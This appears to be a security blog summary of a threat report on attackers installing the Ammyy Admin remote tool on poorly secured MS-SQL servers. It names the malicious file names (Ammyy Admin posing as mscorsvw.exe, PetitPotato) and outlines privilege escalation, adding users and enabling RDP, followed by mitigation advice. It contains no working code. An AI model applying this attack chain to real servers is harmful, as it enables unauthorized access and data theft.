Threat Overview

A recent threat report published by AlienVault on April 22, 2025, highlights a series of attacks targeting poorly managed Microsoft SQL (MS-SQL) servers. These attacks involve the installation of Ammyy Admin, a remote control tool, which allows attackers to gain unauthorized access and control over affected systems. This report provides an in-depth analysis of the threat, the tactics, techniques, and procedures (TTPs) employed by the attackers, and recommendations for mitigating such threats.

Threat Details

The attacks identified in this report exploit vulnerabilities in MS-SQL servers that are not properly managed or secured. The primary objective of these attacks is to install Ammyy Admin, a legitimate remote administration tool that has been repurposed for malicious activities. Once installed, the attackers can execute commands to gather system information and use tools like WGet to download additional malware.

The malware components identified in this campaign include:
1. Ammyy Admin (mscorsvw.exe) – An old version (v3.10) of the remote control tool.
2. Settings file (settings3.bin) – Configuration settings for Ammyy Admin.
3. PetitPotato (p.ax) – A privilege escalation tool used to gain higher-level access on the compromised system.

The attackers utilize known exploitation methods to install these components and gain remote control over the affected servers. They also employ PetitPotato for privilege escalation, adding new users and activating Remote Desktop Protocol (RDP) services to maintain persistent access.

Attacker Group

While the report does not provide a detailed description of the actor group responsible for these attacks, it is evident that they possess advanced knowledge of MS-SQL vulnerabilities and remote administration tools. Their TTPs suggest a high level of sophistication and familiarity with exploiting poorly managed servers.

Impact and Consequences

The installation of Ammyy Admin on compromised MS-SQL servers can have severe consequences, including unauthorized access to sensitive data, data exfiltration, and further compromise of the network. The use of PetitPotato for privilege escalation allows attackers to gain administrative-level access, making it easier to move laterally within the network and deploy additional malware.

Mitigation Recommendations

To prevent such attacks, administrators are advised to implement the following security measures:

1. Use Strong Passwords: Ensure that all MS-SQL server accounts use strong, unique passwords that are regularly updated.
2. Regular Software Updates: Keep all software, including MS-SQL servers and remote administration tools, up-to-date with the latest security patches.
3. Implement Firewalls: Deploy firewalls to monitor and control incoming and outgoing network traffic based on predetermined security rules.
4. Network Segmentation: Segment the network to limit the spread of malware and restrict access to sensitive data.
5. Intrusion Detection Systems (IDS): Use IDS to detect and respond to suspicious activities in real-time.
6. Regular Security Audits: Conduct regular security audits to identify and address vulnerabilities in MS-SQL servers and other critical systems.

By following these recommendations, organizations can significantly reduce the risk of falling victim to such attacks and enhance their overall cybersecurity posture.

Conclusion

The threat report published by AlienVault underscores the importance of proactive security measures in protecting MS-SQL servers from malicious attacks. By understanding the TTPs employed by attackers and implementing robust security controls, organizations can effectively mitigate the risks associated with these threats and safeguard their critical assets.

For additional information on this threat, please refer to the following external references:
– https://asec.ahnlab.com/en/87606
– https://otx.alienvault.com/pulse/6807c69906b162a197133ee9

Please check the following page for additional information: https://asec.ahnlab.com/en/87606